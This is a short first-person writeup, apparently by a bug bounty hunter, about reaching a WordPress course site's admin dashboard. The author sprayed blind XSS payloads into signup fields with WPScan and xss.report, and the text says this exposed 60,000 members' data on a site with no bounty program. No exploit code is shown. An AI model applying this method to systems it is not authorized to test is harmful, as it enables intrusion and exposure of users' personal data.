Hello, I’m a bug bounty hunter and security researcher from Morocco. In this writeup, I’ll walk you through how I gained access to sensitive data on a website that sells courses, mentorships, and seminars for both beginner and advanced traders. My goal was to access these resources for free
Reconnaissance
Using Wappalyzer, I discovered that the site runs on WordPress. Whenever I see WordPress, my first step is to run WPScan
WPScan Command:
wpscan --url https://targetsite.comThe target was using a outdated versions of WordPress and plugins, one of which was an admin dashboard vulnerable to blind XSS.
Potential Attack Scenarios
I listed several attack scenarios to gain free access to paid content:
Account takeover on paid accounts
- CSRF on critical forms (email, password)
- XSS leading to account takeover
Accessing the admin dashboard
- Fuzzing endpoints
- Information disclosure
- Spraying blind XSS payloads
Account Takeover on Paid Accounts
1. CSRF
The site lacked CSRF protection, meaning I could potentially change a victim’s email or password. However, this required user interaction, such as clicking a malicious link, so I moved on to other methods.
Accessing the Admin Dashboard
1. Fuzzing Endpoints
My primary tool is Burp Suite’s Turbo Intruder, but in this case, WPScan revealed an accessible listing of the uploads folder. Unfortunately, it only contained PDFs, images, and icons — nothing useful.
2. Spraying Blind XSS
I generally avoid spraying payloads, but seeing the outdated WordPress version and plugins, and the target didn’t have a bug bounty program, I knew there is low-hanging vulnerabilities like XSS. I started injecting blind XSS payloads using xss.report on every form I see (e.g., username, first and last name, email, password, user agent).
Just before testing other attacks, an admin logged into the dashboard, and the XSS payload I had inserted in the username field executed. I received a notification in my email, confirming the execution.
Results
I gained access to the admin dashboard, which allowed me to access data on 60,000 members, including courses, mentorships, and videos.
Thankfully after sending a report via they’re email, the team was nice and active and patched them quickly